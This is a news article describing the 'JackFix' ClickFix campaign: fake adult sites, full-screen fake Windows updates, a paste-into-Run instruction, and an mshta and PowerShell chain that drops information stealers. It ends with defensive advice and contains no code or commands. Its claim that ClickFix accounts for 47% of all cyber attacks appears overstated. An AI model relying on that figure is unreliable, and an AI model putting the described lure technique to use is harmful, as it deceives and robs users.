Cybersecurity experts have uncovered a new cyber attack campaign that combines ClickFix lures and fake adult websites to trick users into executing malicious commands disguised as a “critical” Windows security update.
The campaign uses fake adult websites such as xHamster and PornHub clones to lure victims into installing a supposed security update. This tactic adds psychological pressure on users to comply with the fake installation process.
ClickFix attacks have been on the rise, with a significant increase in the past year. These attacks deceive users into running malicious commands under the guise of technical fixes or verification checks. According to Microsoft data, ClickFix attacks account for 47% of all cyber attacks.
The latest campaign, dubbed JackFix, displays realistic fake Windows update screens to trick users into running malicious code. The attackers have moved away from traditional robot-check lures in favor of more convincing tactics.
One alarming aspect of this attack is that the fake Windows update alert takes over the entire screen and instructs the victim to open the Windows Run dialog, press Ctrl + V, and hit Enter, triggering the infection process.
The attack begins with users being redirected to a fake adult website via malvertising or other social engineering methods. The site then presents users with a fake “urgent security update” prompt. Some versions of these sites contain developer comments in Russian, hinting at a possible Russian-speaking threat actor.
The fake Windows Update screen is created using HTML and JavaScript code, mimicking a legitimate Windows update window. The attackers use obfuscation techniques to hide the malicious code and prevent users from escaping the full-screen alert.
The initial command executed in the attack is an MSHTA payload launched using the legitimate mshta.exe binary. This payload runs a PowerShell command to retrieve another PowerShell script from a remote server, adding an extra layer of obfuscation.
The PowerShell script used in the attack employs various obfuscation and anti-analysis methods to evade detection. It attempts to elevate privileges, create antivirus exclusions, and drop multiple payloads, including remote access trojans (RATs) like Rhadamanthys Stealer and Vidar Stealer 2.0.
The disclosure of this attack coincides with Huntress revealing a multi-stage malware execution chain that starts with a ClickFix lure posing as a Windows update. The attack deploys stealer malware like Lumma and Rhadamanthys by hiding the final stages within an image using steganography.
Organizations can protect against ClickFix attacks by educating employees to recognize threats and implementing security measures like disabling the Windows Run box through Registry changes or Group Policy.
